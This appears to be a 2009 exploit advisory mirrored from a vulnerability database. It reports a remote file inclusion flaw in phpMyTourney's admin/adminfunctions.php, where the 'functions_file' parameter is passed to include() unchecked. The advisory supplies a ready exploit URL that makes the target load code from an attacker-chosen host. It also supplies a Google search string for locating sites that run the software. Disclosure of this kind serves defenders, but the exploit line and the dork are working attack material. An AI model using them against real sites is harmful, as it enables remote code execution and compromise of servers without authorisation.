Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22051
HistoryJun 18, 2009 - 12:00 a.m.

phpMyTourney adminfunctions.php Remote File Include Vulnerabilities

2009-06-1800:00:00
vulners.com
19

Hi
a bug in phpMyTourney that allows to us to occur a Remote File Include on a Remote machin.

Bug :

#####################################################################################

Islamic Republic Of Iran Security Team

Www.IrIsT.Ir

#####################################################################################

phpMyTourney adminfunctions.php Remote File Include Vulnerabilities

Download…: http:/phpmytourney.sourceforge.net

file;

dminfunctions.php

bug;

include($functions_file);

Exploit…: http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]?

#####################################################################################

Bug Found…: IrIsT™

discovery…: Am!r (IrIsT™)

contact…: IrIsT.Ir[at]Gmail.Com

Google Search.: "Powered By phpMyTourney"

#####################################################################################